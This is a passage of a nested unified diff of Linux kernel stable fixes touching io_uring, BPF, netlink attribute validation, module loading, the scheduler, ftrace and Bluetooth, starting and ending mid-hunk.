+-	io_req_complete_post(req);
+-}
+-
+-void io_req_tw_post_queue(struct io_kiocb *req, s32 res, u32 cflags)
+-{
+-	io_req_set_res(req, res, cflags);
+-	req->io_task_work.func = io_req_tw_post;
+-	io_req_task_work_add(req);
+-}
+-
+ static void io_req_task_cancel(struct io_kiocb *req, bool *locked)
+ {
+ 	/* not needed for normal modes, but SQPOLL depends on it */
+@@ -1641,6 +1616,7 @@ static u32 io_get_sequence(struct io_kiocb *req)
+ }
+ 
+ static __cold void io_drain_req(struct io_kiocb *req)
++	__must_hold(&ctx->uring_lock)
+ {
+ 	struct io_ring_ctx *ctx = req->ctx;
+ 	struct io_defer_entry *de;
+@@ -1658,17 +1634,12 @@ queue:
+ 	}
+ 	spin_unlock(&ctx->completion_lock);
+ 
+-	ret = io_req_prep_async(req);
+-	if (ret) {
+-fail:
+-		io_req_complete_failed(req, ret);
+-		return;
+-	}
+ 	io_prep_async_link(req);
+ 	de = kmalloc(sizeof(*de), GFP_KERNEL);
+ 	if (!de) {
+ 		ret = -ENOMEM;
+-		goto fail;
++		io_req_complete_failed(req, ret);
++		return;
+ 	}
+ 
+ 	spin_lock(&ctx->completion_lock);
+@@ -1942,13 +1913,16 @@ static void io_queue_sqe_fallback(struct io_kiocb *req)
+ 		req->flags &= ~REQ_F_HARDLINK;
+ 		req->flags |= REQ_F_LINK;
+ 		io_req_complete_failed(req, req->cqe.res);
+-	} else if (unlikely(req->ctx->drain_active)) {
+-		io_drain_req(req);
+ 	} else {
+ 		int ret = io_req_prep_async(req);
+ 
+-		if (unlikely(ret))
++		if (unlikely(ret)) {
+ 			io_req_complete_failed(req, ret);
++			return;
++		}
++
++		if (unlikely(req->ctx->drain_active))
++			io_drain_req(req);
+ 		else
+ 			io_queue_iowq(req, NULL);
+ 	}
+@@ -2877,7 +2851,7 @@ static __cold bool io_cancel_defer_files(struct io_ring_ctx *ctx,
+ 	while (!list_empty(&list)) {
+ 		de = list_first_entry(&list, struct io_defer_entry, list);
+ 		list_del_init(&de->list);
+-		io_req_complete_failed(de->req, -ECANCELED);
++		io_req_task_queue_fail(de->req, -ECANCELED);
+ 		kfree(de);
+ 	}
+ 	return true;
+diff --git a/io_uring/io_uring.h b/io_uring/io_uring.h
+index 4334cd30c423d..90b675c65b840 100644
+--- a/io_uring/io_uring.h
++++ b/io_uring/io_uring.h
+@@ -33,7 +33,6 @@ int io_run_local_work(struct io_ring_ctx *ctx);
+ void io_req_complete_failed(struct io_kiocb *req, s32 res);
+ void __io_req_complete(struct io_kiocb *req, unsigned issue_flags);
+ void io_req_complete_post(struct io_kiocb *req);
+-void __io_req_complete_post(struct io_kiocb *req);
+ bool io_post_aux_cqe(struct io_ring_ctx *ctx, u64 user_data, s32 res, u32 cflags,
+ 		     bool allow_overflow);
+ bool io_fill_cqe_aux(struct io_ring_ctx *ctx, u64 user_data, s32 res, u32 cflags,
+@@ -51,10 +50,9 @@ static inline bool io_req_ffs_set(struct io_kiocb *req)
+ 	return req->flags & REQ_F_FIXED_FILE;
+ }
+ 
++void __io_req_task_work_add(struct io_kiocb *req, bool allow_local);
+ bool io_is_uring_fops(struct file *file);
+ bool io_alloc_async_data(struct io_kiocb *req);
+-void io_req_task_work_add(struct io_kiocb *req);
+-void io_req_tw_post_queue(struct io_kiocb *req, s32 res, u32 cflags);
+ void io_req_task_queue(struct io_kiocb *req);
+ void io_queue_iowq(struct io_kiocb *req, bool *dont_use);
+ void io_req_task_complete(struct io_kiocb *req, bool *locked);
+@@ -83,6 +81,11 @@ bool __io_alloc_req_refill(struct io_ring_ctx *ctx);
+ bool io_match_task_safe(struct io_kiocb *head, struct task_struct *task,
+ 			bool cancel_all);
+ 
++static inline void io_req_task_work_add(struct io_kiocb *req)
++{
++	__io_req_task_work_add(req, true);
++}
++
+ #define io_for_each_link(pos, head) \
+ 	for (pos = (head); pos; pos = pos->link)
+ 
+@@ -376,4 +379,11 @@ static inline bool io_allowed_run_tw(struct io_ring_ctx *ctx)
+ 		      ctx->submitter_task == current);
+ }
+ 
++static inline void io_req_queue_tw_complete(struct io_kiocb *req, s32 res)
++{
++	io_req_set_res(req, res, 0);
++	req->io_task_work.func = io_req_task_complete;
++	io_req_task_work_add(req);
++}
++
+ #endif
+diff --git a/io_uring/msg_ring.c b/io_uring/msg_ring.c
+index a49ccab262d53..7d5b544cfc305 100644
+--- a/io_uring/msg_ring.c
++++ b/io_uring/msg_ring.c
+@@ -30,6 +30,8 @@ static int io_msg_ring_data(struct io_kiocb *req)
+ 
+ 	if (msg->src_fd || msg->dst_fd || msg->flags)
+ 		return -EINVAL;
++	if (target_ctx->flags & IORING_SETUP_R_DISABLED)
++		return -EBADFD;
+ 
+ 	if (io_post_aux_cqe(target_ctx, msg->user_data, msg->len, 0, true))
+ 		return 0;
+@@ -84,6 +86,8 @@ static int io_msg_send_fd(struct io_kiocb *req, unsigned int issue_flags)
+ 
+ 	if (target_ctx == ctx)
+ 		return -EINVAL;
++	if (target_ctx->flags & IORING_SETUP_R_DISABLED)
++		return -EBADFD;
+ 
+ 	ret = io_double_lock_ctx(ctx, target_ctx, issue_flags);
+ 	if (unlikely(ret))
+diff --git a/io_uring/net.c b/io_uring/net.c
+index bdd2b4e370b35..9046e269e5a58 100644
+--- a/io_uring/net.c
++++ b/io_uring/net.c
+@@ -62,6 +62,7 @@ struct io_sr_msg {
+ 	u16				flags;
+ 	/* initialised and used only by !msg send variants */
+ 	u16				addr_len;
++	u16				buf_group;
+ 	void __user			*addr;
+ 	/* used only for send zerocopy */
+ 	struct io_kiocb 		*notif;
+@@ -565,6 +566,15 @@ int io_recvmsg_prep(struct io_kiocb *req, const struct io_uring_sqe *sqe)
+ 		if (req->opcode == IORING_OP_RECV && sr->len)
+ 			return -EINVAL;
+ 		req->flags |= REQ_F_APOLL_MULTISHOT;
++		/*
++		 * Store the buffer group for this multishot receive separately,
++		 * as if we end up doing an io-wq based issue that selects a
++		 * buffer, it has to be committed immediately and that will
++		 * clear ->buf_list. This means we lose the link to the buffer
++		 * list, and the eventual buffer put on completion then cannot
++		 * restore it.
++		 */
++		sr->buf_group = req->buf_index;
+ 	}
+ 
+ #ifdef CONFIG_COMPAT
+@@ -581,6 +591,7 @@ static inline void io_recv_prep_retry(struct io_kiocb *req)
+ 
+ 	sr->done_io = 0;
+ 	sr->len = 0; /* get from the provided buffer */
++	req->buf_index = sr->buf_group;
+ }
+ 
+ /*
+diff --git a/io_uring/timeout.c b/io_uring/timeout.c
+index 06200fe73a044..4c6a5666541cf 100644
+--- a/io_uring/timeout.c
++++ b/io_uring/timeout.c
+@@ -63,7 +63,7 @@ static bool io_kill_timeout(struct io_kiocb *req, int status)
+ 		atomic_set(&req->ctx->cq_timeouts,
+ 			atomic_read(&req->ctx->cq_timeouts) + 1);
+ 		list_del_init(&timeout->list);
+-		io_req_tw_post_queue(req, status, 0);
++		io_req_queue_tw_complete(req, status);
+ 		return true;
+ 	}
+ 	return false;
+@@ -161,7 +161,7 @@ void io_disarm_next(struct io_kiocb *req)
+ 		req->flags &= ~REQ_F_ARM_LTIMEOUT;
+ 		if (link && link->opcode == IORING_OP_LINK_TIMEOUT) {
+ 			io_remove_next_linked(req);
+-			io_req_tw_post_queue(link, -ECANCELED, 0);
++			io_req_queue_tw_complete(link, -ECANCELED);
+ 		}
+ 	} else if (req->flags & REQ_F_LINK_TIMEOUT) {
+ 		struct io_ring_ctx *ctx = req->ctx;
+@@ -170,7 +170,7 @@ void io_disarm_next(struct io_kiocb *req)
+ 		link = io_disarm_linked_timeout(req);
+ 		spin_unlock_irq(&ctx->timeout_lock);
+ 		if (link)
+-			io_req_tw_post_queue(link, -ECANCELED, 0);
++			io_req_queue_tw_complete(link, -ECANCELED);
+ 	}
+ 	if (unlikely((req->flags & REQ_F_FAIL) &&
+ 		     !(req->flags & REQ_F_HARDLINK)))
+@@ -284,11 +284,11 @@ static void io_req_task_link_timeout(struct io_kiocb *req, bool *locked)
+ 			ret = io_try_cancel(req->task->io_uring, &cd, issue_flags);
+ 		}
+ 		io_req_set_res(req, ret ?: -ETIME, 0);
+-		io_req_complete_post(req);
++		io_req_task_complete(req, locked);
+ 		io_put_req(prev);
+ 	} else {
+ 		io_req_set_res(req, -ETIME, 0);
+-		io_req_complete_post(req);
++		io_req_task_complete(req, locked);
+ 	}
+ }
+ 
+diff --git a/kernel/bpf/hashtab.c b/kernel/bpf/hashtab.c
+index f39ee3e055897..c4811984fafa4 100644
+--- a/kernel/bpf/hashtab.c
++++ b/kernel/bpf/hashtab.c
+@@ -152,7 +152,7 @@ static inline int htab_lock_bucket(const struct bpf_htab *htab,
+ {
+ 	unsigned long flags;
+ 
+-	hash = hash & HASHTAB_MAP_LOCK_MASK;
++	hash = hash & min_t(u32, HASHTAB_MAP_LOCK_MASK, htab->n_buckets - 1);
+ 
+ 	preempt_disable();
+ 	if (unlikely(__this_cpu_inc_return(*(htab->map_locked[hash])) != 1)) {
+@@ -171,7 +171,7 @@ static inline void htab_unlock_bucket(const struct bpf_htab *htab,
+ 				      struct bucket *b, u32 hash,
+ 				      unsigned long flags)
+ {
+-	hash = hash & HASHTAB_MAP_LOCK_MASK;
++	hash = hash & min_t(u32, HASHTAB_MAP_LOCK_MASK, htab->n_buckets - 1);
+ 	raw_spin_unlock_irqrestore(&b->raw_lock, flags);
+ 	__this_cpu_dec(*(htab->map_locked[hash]));
+ 	preempt_enable();
+diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
+index b4d5b343c1912..398a0008aff72 100644
+--- a/kernel/bpf/verifier.c
++++ b/kernel/bpf/verifier.c
+@@ -3063,7 +3063,9 @@ static int check_stack_write_fixed_off(struct bpf_verifier_env *env,
+ 		bool sanitize = reg && is_spillable_regtype(reg->type);
+ 
+ 		for (i = 0; i < size; i++) {
+-			if (state->stack[spi].slot_type[i] == STACK_INVALID) {
++			u8 type = state->stack[spi].slot_type[i];
++
++			if (type != STACK_MISC && type != STACK_ZERO) {
+ 				sanitize = true;
+ 				break;
+ 			}
+diff --git a/kernel/kcsan/kcsan_test.c b/kernel/kcsan/kcsan_test.c
+index dcec1b743c694..a60c561724be9 100644
+--- a/kernel/kcsan/kcsan_test.c
++++ b/kernel/kcsan/kcsan_test.c
+@@ -159,7 +159,7 @@ static bool __report_matches(const struct expect_report *r)
+ 	const bool is_assert = (r->access[0].type | r->access[1].type) & KCSAN_ACCESS_ASSERT;
+ 	bool ret = false;
+ 	unsigned long flags;
+-	typeof(observed.lines) expect;
++	typeof(*observed.lines) *expect;
+ 	const char *end;
+ 	char *cur;
+ 	int i;
+@@ -168,6 +168,10 @@ static bool __report_matches(const struct expect_report *r)
+ 	if (!report_available())
+ 		return false;
+ 
++	expect = kmalloc(sizeof(observed.lines), GFP_KERNEL);
++	if (WARN_ON(!expect))
++		return false;
++
+ 	/* Generate expected report contents. */
+ 
+ 	/* Title */
+@@ -253,6 +257,7 @@ static bool __report_matches(const struct expect_report *r)
+ 		strstr(observed.lines[2], expect[1])));
+ out:
+ 	spin_unlock_irqrestore(&observed.lock, flags);
++	kfree(expect);
+ 	return ret;
+ }
+ 
+diff --git a/kernel/module/main.c b/kernel/module/main.c
+index d02d39c7174e1..7a627345d4fd9 100644
+--- a/kernel/module/main.c
++++ b/kernel/module/main.c
+@@ -2386,7 +2386,8 @@ static bool finished_loading(const char *name)
+ 	sched_annotate_sleep();
+ 	mutex_lock(&module_mutex);
+ 	mod = find_module_all(name, strlen(name), true);
+-	ret = !mod || mod->state == MODULE_STATE_LIVE;
++	ret = !mod || mod->state == MODULE_STATE_LIVE
++		|| mod->state == MODULE_STATE_GOING;
+ 	mutex_unlock(&module_mutex);
+ 
+ 	return ret;
+@@ -2562,20 +2563,35 @@ static int add_unformed_module(struct module *mod)
+ 
+ 	mod->state = MODULE_STATE_UNFORMED;
+ 
+-again:
+ 	mutex_lock(&module_mutex);
+ 	old = find_module_all(mod->name, strlen(mod->name), true);
+ 	if (old != NULL) {
+-		if (old->state != MODULE_STATE_LIVE) {
++		if (old->state == MODULE_STATE_COMING
++		    || old->state == MODULE_STATE_UNFORMED) {
+ 			/* Wait in case it fails to load. */
+ 			mutex_unlock(&module_mutex);
+ 			err = wait_event_interruptible(module_wq,
+ 					       finished_loading(mod->name));
+ 			if (err)
+ 				goto out_unlocked;
+-			goto again;
++
++			/* The module might have gone in the meantime. */
++			mutex_lock(&module_mutex);
++			old = find_module_all(mod->name, strlen(mod->name),
++					      true);
+ 		}
+-		err = -EEXIST;
++
++		/*
++		 * We are here only when the same module was being loaded. Do
++		 * not try to load it again right now. This prevents long delays
++		 * caused by serialized module load failures, which might happen
++		 * when multiple devices of the same type each trigger a load of
++		 * the same module.
++		 */
++		if (old && old->state == MODULE_STATE_LIVE)
++			err = -EEXIST;
++		else
++			err = -EBUSY;
+ 		goto out;
+ 	}
+ 	mod_update_bounds(mod);
+diff --git a/kernel/sched/fair.c b/kernel/sched/fair.c
+index 0f32acb05055f..2c3d0d49c80ea 100644
+--- a/kernel/sched/fair.c
++++ b/kernel/sched/fair.c
+@@ -7213,11 +7213,11 @@ static int find_energy_efficient_cpu(struct task_struct *p, int prev_cpu)
+ 	eenv_task_busy_time(&eenv, p, prev_cpu);
+ 
+ 	for (; pd; pd = pd->next) {
++		unsigned long util_min = p_util_min, util_max = p_util_max;
+ 		unsigned long cpu_cap, cpu_thermal_cap, util;
+ 		unsigned long cur_delta, max_spare_cap = 0;
+ 		unsigned long rq_util_min, rq_util_max;
+-		unsigned long util_min, util_max;
+-		bool compute_prev_delta = false;
++		unsigned long prev_spare_cap = 0;
+ 		int max_spare_cap_cpu = -1;
+ 		unsigned long base_energy;
+ 
+@@ -7235,6 +7235,8 @@ static int find_energy_efficient_cpu(struct task_struct *p, int prev_cpu)
+ 		eenv.pd_cap = 0;
+ 
+ 		for_each_cpu(cpu, cpus) {
++			struct rq *rq = cpu_rq(cpu);
++
+ 			eenv.pd_cap += cpu_thermal_cap;
+ 
+ 			if (!cpumask_test_cpu(cpu, sched_domain_span(sd)))
+@@ -7253,24 +7255,19 @@ static int find_energy_efficient_cpu(struct task_struct *p, int prev_cpu)
+ 			 * much capacity we can get out of the CPU; this is
+ 			 * aligned with sched_cpu_util().
+ 			 */
+-			if (uclamp_is_used()) {
+-				if (uclamp_rq_is_idle(cpu_rq(cpu))) {
+-					util_min = p_util_min;
+-					util_max = p_util_max;
+-				} else {
+-					/*
+-					 * Open code uclamp_rq_util_with() except for
+-					 * the clamp() part. Ie: apply max aggregation
+-					 * only. util_fits_cpu() logic requires to
+-					 * operate on non clamped util but must use the
+-					 * max-aggregated uclamp_{min, max}.
+-					 */
+-					rq_util_min = uclamp_rq_get(cpu_rq(cpu), UCLAMP_MIN);
+-					rq_util_max = uclamp_rq_get(cpu_rq(cpu), UCLAMP_MAX);
+-
+-					util_min = max(rq_util_min, p_util_min);
+-					util_max = max(rq_util_max, p_util_max);
+-				}
++			if (uclamp_is_used() && !uclamp_rq_is_idle(rq)) {
++				/*
++				 * Open code uclamp_rq_util_with() except for
++				 * the clamp() part. Ie: apply max aggregation
++				 * only. util_fits_cpu() logic requires to
++				 * operate on non clamped util but must use the
++				 * max-aggregated uclamp_{min, max}.
++				 */
++				rq_util_min = uclamp_rq_get(rq, UCLAMP_MIN);
++				rq_util_max = uclamp_rq_get(rq, UCLAMP_MAX);
++
++				util_min = max(rq_util_min, p_util_min);
++				util_max = max(rq_util_max, p_util_max);
+ 			}
+ 			if (!util_fits_cpu(util, util_min, util_max, cpu))
+ 				continue;
+@@ -7279,18 +7276,19 @@ static int find_energy_efficient_cpu(struct task_struct *p, int prev_cpu)
+ 
+ 			if (cpu == prev_cpu) {
+ 				/* Always use prev_cpu as a candidate. */
+-				compute_prev_delta = true;
++				prev_spare_cap = cpu_cap;
+ 			} else if (cpu_cap > max_spare_cap) {
+ 				/*
+ 				 * Find the CPU with the maximum spare capacity
+-				 * in the performance domain.
++				 * among the remaining CPUs in the performance
++				 * domain.
+ 				 */
+ 				max_spare_cap = cpu_cap;
+ 				max_spare_cap_cpu = cpu;
+ 			}
+ 		}
+ 
+-		if (max_spare_cap_cpu < 0 && !compute_prev_delta)
++		if (max_spare_cap_cpu < 0 && prev_spare_cap == 0)
+ 			continue;
+ 
+ 		eenv_pd_busy_time(&eenv, cpus, p);
+@@ -7298,7 +7296,7 @@ static int find_energy_efficient_cpu(struct task_struct *p, int prev_cpu)
+ 		base_energy = compute_energy(&eenv, pd, cpus, p, -1);
+ 
+ 		/* Evaluate the energy impact of using prev_cpu. */
+-		if (compute_prev_delta) {
++		if (prev_spare_cap > 0) {
+ 			prev_delta = compute_energy(&eenv, pd, cpus, p,
+ 						    prev_cpu);
+ 			/* CPU utilization has changed */
+@@ -7309,7 +7307,7 @@ static int find_energy_efficient_cpu(struct task_struct *p, int prev_cpu)
+ 		}
+ 
+ 		/* Evaluate the energy impact of using max_spare_cap_cpu. */
+-		if (max_spare_cap_cpu >= 0) {
++		if (max_spare_cap_cpu >= 0 && max_spare_cap > prev_spare_cap) {
+ 			cur_delta = compute_energy(&eenv, pd, cpus, p,
+ 						   max_spare_cap_cpu);
+ 			/* CPU utilization has changed */
+diff --git a/kernel/trace/ftrace.c b/kernel/trace/ftrace.c
+index 33236241f2364..6f726ea0fde01 100644
+--- a/kernel/trace/ftrace.c
++++ b/kernel/trace/ftrace.c
+@@ -1248,12 +1248,17 @@ static void free_ftrace_hash_rcu(struct ftrace_hash *hash)
+ 	call_rcu(&hash->rcu, __free_ftrace_hash_rcu);
+ }
+ 
++/**
++ * ftrace_free_filter - remove all filters for an ftrace_ops
++ * @ops: the ops to remove the filters from
++ */
+ void ftrace_free_filter(struct ftrace_ops *ops)
+ {
+ 	ftrace_ops_init(ops);
+ 	free_ftrace_hash(ops->func_hash->filter_hash);
+ 	free_ftrace_hash(ops->func_hash->notrace_hash);
+ }
++EXPORT_SYMBOL_GPL(ftrace_free_filter);
+ 
+ static struct ftrace_hash *alloc_ftrace_hash(int size_bits)
+ {
+@@ -5828,6 +5833,10 @@ EXPORT_SYMBOL_GPL(modify_ftrace_direct_multi);
+  *
+  * Filters denote which functions should be enabled when tracing is enabled
+  * If @ip is NULL, it fails to update filter.
++ *
++ * This can allocate memory which must be freed before @ops can be freed,
++ * either by removing each filtered addr or by using
++ * ftrace_free_filter(@ops).
+  */
+ int ftrace_set_filter_ip(struct ftrace_ops *ops, unsigned long ip,
+ 			 int remove, int reset)
+@@ -5847,7 +5856,11 @@ EXPORT_SYMBOL_GPL(ftrace_set_filter_ip);
+  *
+  * Filters denote which functions should be enabled when tracing is enabled
+ * If @ips array or any ip specified within is NULL, it fails to update filter.
+- */
++ *
++ * This can allocate memory which must be freed before @ops can be freed,
++ * either by removing each filtered addr or by using
++ * ftrace_free_filter(@ops).
++ */
+ int ftrace_set_filter_ips(struct ftrace_ops *ops, unsigned long *ips,
+ 			  unsigned int cnt, int remove, int reset)
+ {
+@@ -5889,6 +5902,10 @@ ftrace_set_regex(struct ftrace_ops *ops, unsigned char *buf, int len,
+  *
+  * Filters denote which functions should be enabled when tracing is enabled.
+  * If @buf is NULL and reset is set, all functions will be enabled for tracing.
++ *
++ * This can allocate memory which must be freed before @ops can be freed,
++ * either by removing each filtered addr or by using
++ * ftrace_free_filter(@ops).
+  */
+ int ftrace_set_filter(struct ftrace_ops *ops, unsigned char *buf,
+ 		       int len, int reset)
+@@ -5908,6 +5925,10 @@ EXPORT_SYMBOL_GPL(ftrace_set_filter);
+  * Notrace Filters denote which functions should not be enabled when tracing
+  * is enabled. If @buf is NULL and reset is set, all functions will be enabled
+  * for tracing.
++ *
++ * This can allocate memory which must be freed before @ops can be freed,
++ * either by removing each filtered addr or by using
++ * ftrace_free_filter(@ops).
+  */
+ int ftrace_set_notrace(struct ftrace_ops *ops, unsigned char *buf,
+ 			int len, int reset)
+diff --git a/kernel/trace/trace.c b/kernel/trace/trace.c
+index 3076af8dbf32e..546e84ae9993b 100644
+--- a/kernel/trace/trace.c
++++ b/kernel/trace/trace.c
+@@ -10291,6 +10291,8 @@ void __init early_trace_init(void)
+ 			static_key_enable(&tracepoint_printk_key.key);
+ 	}
+ 	tracer_alloc_buffers();
++
++	init_events();
+ }
+ 
+ void __init trace_init(void)
+diff --git a/kernel/trace/trace.h b/kernel/trace/trace.h
+index 5581754d97628..9e931f51328a2 100644
+--- a/kernel/trace/trace.h
++++ b/kernel/trace/trace.h
+@@ -1490,6 +1490,7 @@ extern void trace_event_enable_cmd_record(bool enable);
+ extern void trace_event_enable_tgid_record(bool enable);
+ 
+ extern int event_trace_init(void);
++extern int init_events(void);
+ extern int event_trace_add_tracer(struct dentry *parent, struct trace_array *tr);
+ extern int event_trace_del_tracer(struct trace_array *tr);
+ extern void __trace_early_add_events(struct trace_array *tr);
+diff --git a/kernel/trace/trace_events_hist.c b/kernel/trace/trace_events_hist.c
+index c6e406995c112..da3bfe8625d96 100644
+--- a/kernel/trace/trace_events_hist.c
++++ b/kernel/trace/trace_events_hist.c
+@@ -1975,6 +1975,8 @@ static struct hist_field *create_hist_field(struct hist_trigger_data *hist_data,
+ 		hist_field->fn_num = flags & HIST_FIELD_FL_LOG2 ? HIST_FIELD_FN_LOG2 :
+ 			HIST_FIELD_FN_BUCKET;
+ 		hist_field->operands[0] = create_hist_field(hist_data, field, fl, NULL);
++		if (!hist_field->operands[0])
++			goto free;
+ 		hist_field->size = hist_field->operands[0]->size;
+ 		hist_field->type = kstrdup_const(hist_field->operands[0]->type, GFP_KERNEL);
+ 		if (!hist_field->type)
+diff --git a/kernel/trace/trace_osnoise.c b/kernel/trace/trace_osnoise.c
+index 4300c5dc4e5db..1c07efcb3d466 100644
+--- a/kernel/trace/trace_osnoise.c
++++ b/kernel/trace/trace_osnoise.c
+@@ -125,9 +125,8 @@ static void osnoise_unregister_instance(struct trace_array *tr)
+ 	 * register/unregister serialization is provided by trace's
+ 	 * trace_types_lock.
+ 	 */
+-	lockdep_assert_held(&trace_types_lock);
+-
+-	list_for_each_entry_rcu(inst, &osnoise_instances, list) {
++	list_for_each_entry_rcu(inst, &osnoise_instances, list,
++				lockdep_is_held(&trace_types_lock)) {
+ 		if (inst->tr == tr) {
+ 			list_del_rcu(&inst->list);
+ 			found = 1;
+diff --git a/kernel/trace/trace_output.c b/kernel/trace/trace_output.c
+index 67f47ea27921d..5cd4fb6563068 100644
+--- a/kernel/trace/trace_output.c
++++ b/kernel/trace/trace_output.c
+@@ -1568,7 +1568,7 @@ static struct trace_event *events[] __initdata = {
+ 	NULL
+ };
+ 
+-__init static int init_events(void)
++__init int init_events(void)
+ {
+ 	struct trace_event *event;
+ 	int i, ret;
+@@ -1581,4 +1581,3 @@ __init static int init_events(void)
+ 
+ 	return 0;
+ }
+-early_initcall(init_events);
+diff --git a/lib/lockref.c b/lib/lockref.c
+index 45e93ece8ba0d..2afe4c5d89191 100644
+--- a/lib/lockref.c
++++ b/lib/lockref.c
+@@ -23,7 +23,6 @@
+ 		}								\
+ 		if (!--retry)							\
+ 			break;							\
+-		cpu_relax();							\
+ 	}									\
+ } while (0)
+ 
+diff --git a/lib/nlattr.c b/lib/nlattr.c
+index b67a53e29b8fe..dffd60e4065fd 100644
+--- a/lib/nlattr.c
++++ b/lib/nlattr.c
+@@ -10,6 +10,7 @@
+ #include <linux/kernel.h>
+ #include <linux/errno.h>
+ #include <linux/jiffies.h>
++#include <linux/nospec.h>
+ #include <linux/skbuff.h>
+ #include <linux/string.h>
+ #include <linux/types.h>
+@@ -381,6 +382,7 @@ static int validate_nla(const struct nlattr *nla, int maxtype,
+ 	if (type <= 0 || type > maxtype)
+ 		return 0;
+ 
++	type = array_index_nospec(type, maxtype + 1);
+ 	pt = &policy[type];
+ 
+ 	BUG_ON(pt->type > NLA_TYPE_MAX);
+@@ -596,6 +598,7 @@ static int __nla_validate_parse(const struct nlattr *head, int len, int maxtype,
+ 			}
+ 			continue;
+ 		}
++		type = array_index_nospec(type, maxtype + 1);
+ 		if (policy) {
+ 			int err = validate_nla(nla, maxtype, policy,
+ 					       validate, extack, depth);
+diff --git a/mm/compaction.c b/mm/compaction.c
+index ca1603524bbe0..8238e83385a79 100644
+--- a/mm/compaction.c
++++ b/mm/compaction.c
+@@ -1839,6 +1839,7 @@ static unsigned long fast_find_migrateblock(struct compact_control *cc)
+ 					pfn = cc->zone->zone_start_pfn;
+ 				cc->fast_search_fail = 0;
+ 				found_block = true;
++				set_pageblock_skip(freepage);
+ 				break;
+ 			}
+ 		}
+diff --git a/net/bluetooth/hci_conn.c b/net/bluetooth/hci_conn.c
+index 8aab2e882958c..3c3b79f2e4c03 100644
+--- a/net/bluetooth/hci_conn.c
++++ b/net/bluetooth/hci_conn.c
+@@ -821,6 +821,7 @@ static void terminate_big_destroy(struct hci_dev *hdev, void *data, int err)
+ static int hci_le_terminate_big(struct hci_dev *hdev, u8 big, u8 bis)
+ {
+ 	struct iso_list_data *d;
++	int ret;
+ 
+ 	bt_dev_dbg(hdev, "big 0x%2.2x bis 0x%2.2x", big, bis);
+ 
+@@ -832,8 +833,12 @@ static int hci_le_terminate_big(struct hci_dev *hdev, u8 big, u8 bis)
+ 	d->big = big;
+ 	d->bis = bis;
+ 
+-	return hci_cmd_sync_queue(hdev, terminate_big_sync, d,
+-				  terminate_big_destroy);
++	ret = hci_cmd_sync_queue(hdev, terminate_big_sync, d,
++				 terminate_big_destroy);
++	if (ret)
++		kfree(d);
++
++	return ret;
+ }
+ 
+ static int big_terminate_sync(struct hci_dev *hdev, void *data)
+@@ -858,6 +863,7 @@ static int big_terminate_sync(struct hci_dev *hdev, void *data)
+ static int hci_le_big_terminate(struct hci_dev *hdev, u8 big, u16 sync_handle)
+ {
+ 	struct iso_list_data *d;
++	int ret;
+ 
+ 	bt_dev_dbg(hdev, "big 0x%2.2x sync_handle 0x%4.4x", big, sync_handle);
+ 
+@@ -869,8 +875,12 @@ static int hci_le_big_terminate(struct hci_dev *hdev, u8 big, u16 sync_handle)
+ 	d->big = big;
+ 	d->sync_handle = sync_handle;
+ 
+-	return hci_cmd_sync_queue(hdev, big_terminate_sync, d,
+-				  terminate_big_destroy);
++	ret = hci_cmd_sync_queue(hdev, big_terminate_sync, d,
++				 terminate_big_destroy);
++	if (ret)
++		kfree(d);
++
++	return ret;
+ }
+ 
+ /* Cleanup BIS connection
+diff --git a/net/bluetooth/hci_event.c b/net/bluetooth/hci_event.c
+index faca701bce2a3..0e2425eb6aa79 100644
+--- a/net/bluetooth/hci_event.c
++++ b/net/bluetooth/hci_event.c
+@@ -3838,8 +3838,11 @@ static u8 hci_cc_le_set_cig_params(struct hci_dev *hdev, void *data,
+ 			   conn->handle, conn->link);
+ 
+ 		/* Create CIS if LE is already connected */
+-		if (conn->link && conn->link->state == BT_CONNECTED)
++		if (conn->link && conn->link->state == BT_CONNECTED) {
++			rcu_read_unlock();
+ 			hci_le_create_cis(conn->link);
++			rcu_read_lock();
++		}
+ 
+ 		if (i == rp->num_handles)
+ 			break;
+diff --git a/net/bluetooth/hci_sync.c b/net/bluetooth/hci_sync.c
+index 8d6c8cbfe1de4..3eec688a88a92 100644
+--- a/net/bluetooth/hci_sync.c
++++ b/net/bluetooth/hci_sync.c
+@@ -4703,6 +4703,7 @@ int hci_dev_open_sync(struct hci_dev *hdev)
+ 			hdev->flush(hdev);
+ 
+ 		if (hdev->sent_cmd) {
++			cancel_delayed_work_sync(&hdev->cmd_timer);
+ 			kfree_skb(hdev->sent_cmd);
+ 			hdev->sent_cmd = NULL;
+ 		}
+@@ -6168,20 +6169,13 @@ int hci_get_random_address(struct hci_dev *hdev, bool require_privacy,
+ 
+ static int _update_adv_data_sync(struct hci_dev *hdev, void *data)
+ {
+-	u8 instance = *(u8 *)data;
+-
+-	kfree(data);
++	u8 instance = PTR_ERR(data);
+ 
+ 	return hci_update_adv_data_sync(hdev, instance);
+ }
+ 
+ int hci_update_adv_data(struct hci_dev *hdev, u8 instance)
+ {
+-	u8 *inst_ptr = kmalloc(1, GFP_KERNEL);
+-
+-	if (!inst_ptr)
+-		return -ENOMEM;
+-
+-	*inst_ptr = instance;
+-	return hci_cmd_sync_queue(hdev, _update_adv_data_sync, inst_ptr, NULL);
++	return hci_cmd_sync_queue(hdev, _update_adv_data_sync,
++				  ERR_PTR(instance), NULL);
+ }
+diff --git a/net/bluetooth/iso.c b/net/bluetooth/iso.c
+index 26db929b97c43..2dabef488eaae 100644
+--- a/net/bluetooth/iso.c
++++ b/net/bluetooth/iso.c
+@@ -261,13 +261,13 @@ static int iso_connect_bis(struct sock *sk)
+ 
+ 	if (!bis_capable(hdev)) {
+ 		err = -EOPNOTSUPP;
+-		goto done;
++		goto unlock;
+ 	}
+ 
+ 	/* Fail if out PHYs are marked as disabled */
+ 	if (!iso_pi(sk)->qos.out.phy) {
+ 		err = -EINVAL;
+-		goto done;
++		goto unlock;
+ 	}
+ 
+ 	hcon = hci_connect_bis(hdev, &iso_pi(sk)->dst, iso_pi(sk)->dst_type,
+@@ -275,22 +275,27 @@ static int iso_connect_bis(struct sock *sk)
+ 			       iso_pi(sk)->base);
+ 	if (IS_ERR(hcon)) {
+ 		err = PTR_ERR(hcon);
+-		goto done;
++		goto unlock;
+ 	}
+ 
+ 	conn = iso_conn_add(hcon);
+ 	if (!conn) {
+ 		hci_conn_drop(hcon);
+ 		err = -ENOMEM;
+-		goto done;
++		goto unlock;
+ 	}
+ 
+-	/* Update source addr of the socket */
+-	bacpy(&iso_pi(sk)->src, &hcon->src);
++	hci_dev_unlock(hdev);
++	hci_dev_put(hdev);
+ 
+ 	err = iso_chan_add(conn, sk, NULL);
+ 	if (err)
+-		goto done;
++		return err;
++
